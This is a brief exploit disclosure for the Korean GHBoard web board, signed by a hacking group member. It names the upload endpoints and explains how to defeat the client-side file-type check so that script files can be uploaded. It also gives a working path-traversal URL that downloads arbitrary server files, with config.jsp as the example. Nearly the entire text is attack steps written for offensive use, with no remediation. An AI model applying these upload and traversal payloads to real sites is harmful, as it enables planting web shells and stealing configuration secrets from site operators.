Software : Korean GHBoard
Site : http://www.ghlab.com/
Found by : Xcross87
File Upload Vulnerability
Xploit :
victim.com/ghboard/component/upload.jsp
FlashUpload component File Upload and File Download Vulnerability
Upload Xploit :
victim.com/ghboard/component/flashupload/upload.html
Not allow upload php,jsp,html
But attacker can download source and remove javascript code which check for file type and upload easily.
Uploaded file is located in :
victim.com/ghboard/component/flashupload/data/upload_filename.xxx
Download Xploit :
You can download any file from server :
victim.com/ghboard/component/flashupload/download.jsp?name=[file_name]
Sample :
victim.com/ghboard/component/flashupload/download.jsp?name=../config.jsp
=== Xcross87 | HCETeam Xploiter | HCEGroup.Vn ===